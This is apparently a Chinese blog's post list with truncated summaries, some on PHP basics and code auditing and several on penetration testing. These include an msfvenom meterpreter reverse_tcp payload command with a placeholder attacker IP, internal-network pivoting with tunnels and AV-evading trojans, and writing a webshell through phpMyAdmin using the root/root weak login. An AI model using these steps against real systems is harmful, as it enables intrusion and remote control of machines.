R1card0

摘要： 说一下场景，有些情况下，拿到边界机器后纵向拓展，内网套内网，工控设备前面的内网接入点可能就是一个arm或者阉割了的linux。 一个宗旨linux下面万物皆文件 收集到基础信息之后，内网资产收集，可以通过上传对应的frpc，npc，传msf的马子（免杀）添加路由代理socks，使用masscan+n 阅读全文

摘要： 外层打点拿到webshell之后 Windows： msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpret 阅读全文

摘要： 、本文章主要那边界机器作为msf和cs学习练习用 参考链接 https://mp.weixin.qq.com/s?__biz=Mzg2NTA4OTI5NA==&mid=2247484720&idx=1&sn=2772684974b506ee81f7e8def15a37ed&scene=21#wech 阅读全文

摘要： 环境搭建 phpmyadmin拿shell，登录弱口令root root 一、select into outfile直接写入 1.利用条件 对web目录需要有写权限能够使用单引号 知道绝对路径 secure_file_priv没有具体值 2.步骤 查看有没有配置secure_file_priv sh 阅读全文

摘要： PHP下拉菜单多选 如果下拉菜单是多选的（ multiple="multiple"），我们可以通过将设置 select name="q[]" 以数组的方式获取，以下使用 POST 方式提交，代码如下所示： <?php $q = isset($_POST['q'])? $_POST['q'] : '' 阅读全文

摘要： PHP接口 使用接口（interface），可以指定某个类必须实现哪些方法，但不需要定义这些方法的具体内容。 接口是通过 interface 关键字来定义的，就像定义一个标准的类一样，但其中定义所有的方法都是空的。 接口中定义的所有方法都必须是公有，这是接口的特性。 要实现一个接口，使用 imple 阅读全文

摘要： PHPWhile循环 while - 只要指定的条件成立，则循环执行代码块 do...while - 首先执行一次代码块，然后在指定的条件成立时重复这个循环 for - 循环执行代码块指定的次数 foreach - 根据数组中每个元素来循环代码块 while (条件) { 要执行的代码; }实例 < 阅读全文

摘要： PHP数组排序 sort()-对数组进行升序排列 字符排序<?php $cars=array("Volvo","BMW","Toyota"); sort($cars); ?>数字排序<?php$numbers=array(4,6,2,22,11);sort($numbers);?> rsort()- 阅读全文

摘要： PHP数据类型 String（字符串）, Integer（整型）, Float（浮点型）, Boolean（布尔型）, Array（数组）, Object（对象）, NULL（空值）。 PHP类型比较 PHP5常量 使用常量时，不能在常量名前添加$ 符号，不然会将常量转换成新的未定义变量使用，会导致 阅读全文

摘要： 菜鸡跟着前辈文章入门代码审计。 首先看一下这套cms的源代码目录分布 admin//管理员后台 css//css样式 files//功能函数 images//图片文件 inc//配置信息 install//安装目录文件 seacmseditor//seacms编辑器 template//模板文件 u 阅读全文